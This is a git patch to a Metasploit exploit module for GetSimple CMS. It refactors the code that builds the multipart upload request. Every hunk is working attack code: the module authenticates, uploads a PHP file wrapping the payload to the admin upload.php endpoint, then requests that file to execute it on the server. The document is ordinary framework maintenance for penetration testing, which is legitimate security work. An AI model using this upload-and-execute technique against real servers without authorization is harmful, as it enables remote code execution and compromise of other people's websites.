From cbfb7e600ddda5bd960fa3e57bf95b507a29143b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 19 Sep 2014 16:29:09 -0500
Subject: [PATCH] Use Rex::MIME::Message

---
 .../multi/http/getsimplecms_upload_exec.rb    | 29 ++++++++-----------
 1 file changed, 12 insertions(+), 17 deletions(-)

diff --git a/modules/exploits/multi/http/getsimplecms_upload_exec.rb b/modules/exploits/multi/http/getsimplecms_upload_exec.rb
index 48a7afa325..433b541899 100644
--- a/modules/exploits/multi/http/getsimplecms_upload_exec.rb
+++ b/modules/exploits/multi/http/getsimplecms_upload_exec.rb
@@ -67,31 +67,25 @@ class Metasploit3 < Msf::Exploit::Remote
      })
 
      fail_with(Failure::Unknown, "#{peer} - Unknown error while authenticating") unless res.code == 302
+
      return res
    end
 
 
    def upload_file(payload_name, uri, cookie_http_header)
-     boundary = Rex::Text.rand_text_hex(7)
-     post_data = "--#{boundary}\r\n"
-     post_data << "Content-Disposition: form-data; name=\"file[]\"; filename=\"#{payload_name}\"\r\n"
-     post_data << "Content-Type: application/x-httpd-php\r\n\r\n"
-     post_data << "<?php "
-     post_data << payload.encoded
-     post_data << " ?>\r\n\r\n"
-     post_data << "--#{boundary}\r\n"
-     post_data << "Content-Disposition: form-data; name=\"submit\"\r\n\r\n"
-     post_data << "Upload\r\n"
-     post_data << "--#{boundary}--\r\n"
+     data = Rex::MIME::Message.new
+     data.add_part("<?php #{payload.encoded} ?>", 'application/x-httpd-php', nil, "form-data; name=\"file[]\"; filename=\"#{payload_name}\"")
+     data.add_part("Upload", nil, nil, "form-data; name=\"submit\"")
+
+     data_post = data.to_s
 
-     uri = normalize_uri(uri, "admin", "upload.php")
      res = send_request_cgi({
        'method'   => 'POST',
-       'uri'      => "#{uri}",
+       'uri'      => normalize_uri(uri, "admin", "upload.php"),
        'vars_get' => { 'path' =>'' },
        'cookie'   => cookie_http_header,
-       'ctype'    => "multipart/form-data; boundary=#{boundary}",
-       'data'     => post_data
+       'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+       'data'     => data_post
      })
      return res
    end
@@ -112,11 +106,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
      upload_dir = datastore['Upload_dir']
      upload_uri = normalize_uri(uri, upload_dir, payload_name.downcase)
+
      print_status("#{peer} - Executing payload #{payload_name.downcase}")
-     res = send_request_raw({
+     send_request_raw({
        'uri' => upload_uri,
        'method' => 'GET'
-     })
+     }, 5)
    end
 
 end